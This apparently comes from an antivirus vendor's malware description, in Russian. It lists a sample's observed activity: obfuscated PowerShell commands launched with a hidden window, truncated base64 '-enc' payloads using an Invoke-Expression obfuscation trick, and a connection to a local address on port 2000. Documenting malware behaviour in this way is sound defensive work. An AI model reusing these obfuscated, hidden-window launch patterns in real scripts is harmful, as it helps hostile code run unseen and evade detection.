Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) IAAuACgAIAAkAEUATgB2ADoAQwBvAG0AcwBwAGUAQwBbADQALAAyADQALAAyADUAXQAtAEoATwBJAG4AJwAnACkAKAAgAFsAcwB0AFIAaQBOAEcAXQA6ADoASgBvAEkATgAoAC...
- '<LOCALNET>.1.102':2000
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) IAAuACgAIAAkAEUATgB2ADoAQwBvAG0AcwBwAGUAQwBbADQALAAyADQALAAyADUAXQAtAEoATwBJAG4AJwAnACkAKAAgAFsAcwB0AFIAaQBOAEcAXQA6ADoASgBvAEkATgAoAC...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc IAAuACgAIAAkAEUATgB2ADoAQwBvAG0AcwBwAGUAQwBbADQALAAyADQALAAyADUAXQAtAEoATwBJAG4AJwAnACkAKAAgAFsAcwB0AFIAaQBOAEcAXQA6ADoASgBvAEkATgAoACcAJwAgACwAIAAoACAAJwAxADAAMAAxADAAMAB+ADEAMQAwADAAMAAx...